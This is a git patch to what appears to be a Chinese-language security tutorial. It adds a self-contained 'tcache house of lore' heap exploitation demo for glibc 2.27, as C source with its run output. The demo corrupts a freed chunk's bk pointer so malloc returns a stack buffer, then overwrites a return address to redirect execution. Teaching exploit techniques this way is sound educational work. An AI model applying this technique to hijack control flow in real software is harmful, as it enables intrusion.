From b672b21288c59438c720970740c8f900643ba90a Mon Sep 17 00:00:00 2001 From: firmianay Date: Wed, 23 May 2018 11:18:32 +0800 Subject: [PATCH] add tcache_house_of_lore --- doc/3.1.7_heap_exploit_2.md | 92 +++++++++++++++++++ src/others/3.1.6_heap_exploit/Makefile | 2 +- .../3.1.6_heap_exploit/tcache_house_of_lore.c | 66 +++++++++++++ 3 files changed, 159 insertions(+), 1 deletion(-) create mode 100644 src/others/3.1.6_heap_exploit/tcache_house_of_lore.c diff --git a/doc/3.1.7_heap_exploit_2.md b/doc/3.1.7_heap_exploit_2.md index 5185a77..5dbaf3f 100644 --- a/doc/3.1.7_heap_exploit_2.md +++ b/doc/3.1.7_heap_exploit_2.md @@ -672,6 +672,98 @@ READ of size 8 at 0x60c00000bf80 thread T0 #2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38) ``` +最后再给一个 libc-2.27 版本的: +```c +#include +#include +#include +#include + +void jackpot(){ puts("Nice jump d00d"); exit(0); } + +int main() { + intptr_t *victim = malloc(0x80); + + // fill the tcache + int *a[10]; + int i; + for (i = 0; i < 7; i++) { + a[i] = malloc(0x80); + } + for (i = 0; i < 7; i++) { + free(a[i]); + } + + memset(victim, 'A', 0x80); + void *p5 = malloc(0x10); + memset(p5, 'A', 0x10); + intptr_t *victim_chunk = victim - 2; + fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim); + + intptr_t* stack_buffer_1[4] = {0}; + intptr_t* stack_buffer_2[6] = {0}; + stack_buffer_1[0] = 0; + stack_buffer_1[2] = victim_chunk; + stack_buffer_1[3] = (intptr_t*)stack_buffer_2; + stack_buffer_2[2] = (intptr_t*)stack_buffer_1; + stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin; + + fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1); + fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2); + + free((void*)victim); + fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim); + fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + void *p2 = malloc(0x100); + fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2); + fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim); + fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + victim[1] = (intptr_t)stack_buffer_1; + fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); + + void *p3 = malloc(0x40); + + // empty the tcache + for (i = 0; i < 7; i++) { + a[i] = malloc(0x80); + } + + char *p4 = malloc(0x80); + memset(p4, 'A', 0x10); + fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4); + fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]); + + intptr_t sc = (intptr_t)jackpot; + memcpy((p4+0xa8), &sc, 8); +} +``` +``` +$ gcc -g house_of_lore.c +$ ./a.out +Allocated the victim (small) chunk: 0x55674d75f260 +stack_buffer_1: 0x7ffff71fb1d0 +stack_buffer_2: 0x7ffff71fb1f0 + +Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin +victim->fd: 0x7f1eba392b00 +victim->bk: 0x7f1eba392b00 + +Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700 +The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin +victim->fd: 0x7f1eba392b80 +victim->bk: 0x7f1eba392b80 + +Now emulating a vulnerability that can overwrite the victim->bk pointer +This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0 +The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0 + +Nice jump d00d +``` + #### overlapping_chunks ```c #include diff --git a/src/others/3.1.6_heap_exploit/Makefile b/src/others/3.1.6_heap_exploit/Makefile index 9905c35..31fe599 100644 --- a/src/others/3.1.6_heap_exploit/Makefile +++ b/src/others/3.1.6_heap_exploit/Makefile @@ -1,4 +1,4 @@ -PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange +PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore tcache_house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange CFLAGS += -std=c99 -g # CFLAGS += -fsanitize=address diff --git a/src/others/3.1.6_heap_exploit/tcache_house_of_lore.c b/src/others/3.1.6_heap_exploit/tcache_house_of_lore.c new file mode 100644 index 0000000..30a71b7 --- /dev/null +++ b/src/others/3.1.6_heap_exploit/tcache_house_of_lore.c @@ -0,0 +1,66 @@ +#include +#include +#include +#include + +void jackpot(){ puts("Nice jump d00d"); exit(0); } + +int main() { + intptr_t *victim = malloc(0x80); + + // fill the tcache + int *a[10]; + int i; + for (i = 0; i < 7; i++) { + a[i] = malloc(0x80); + } + for (i = 0; i < 7; i++) { + free(a[i]); + } + + memset(victim, 'A', 0x80); + void *p5 = malloc(0x10); + memset(p5, 'A', 0x10); + intptr_t *victim_chunk = victim - 2; + fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim); + + intptr_t* stack_buffer_1[4] = {0}; + intptr_t* stack_buffer_2[6] = {0}; + stack_buffer_1[0] = 0; + stack_buffer_1[2] = victim_chunk; + stack_buffer_1[3] = (intptr_t*)stack_buffer_2; + stack_buffer_2[2] = (intptr_t*)stack_buffer_1; + stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin; + + fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1); + fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2); + + free((void*)victim); + fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim); + fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + void *p2 = malloc(0x100); + fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2); + fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim); + fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + victim[1] = (intptr_t)stack_buffer_1; + fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); + + void *p3 = malloc(0x40); + + // empty the tcache + for (i = 0; i < 7; i++) { + a[i] = malloc(0x80); + } + + char *p4 = malloc(0x80); + memset(p4, 'A', 0x10); + fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4); + fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]); + + intptr_t sc = (intptr_t)jackpot; + memcpy((p4+0xa8), &sc, 8); +}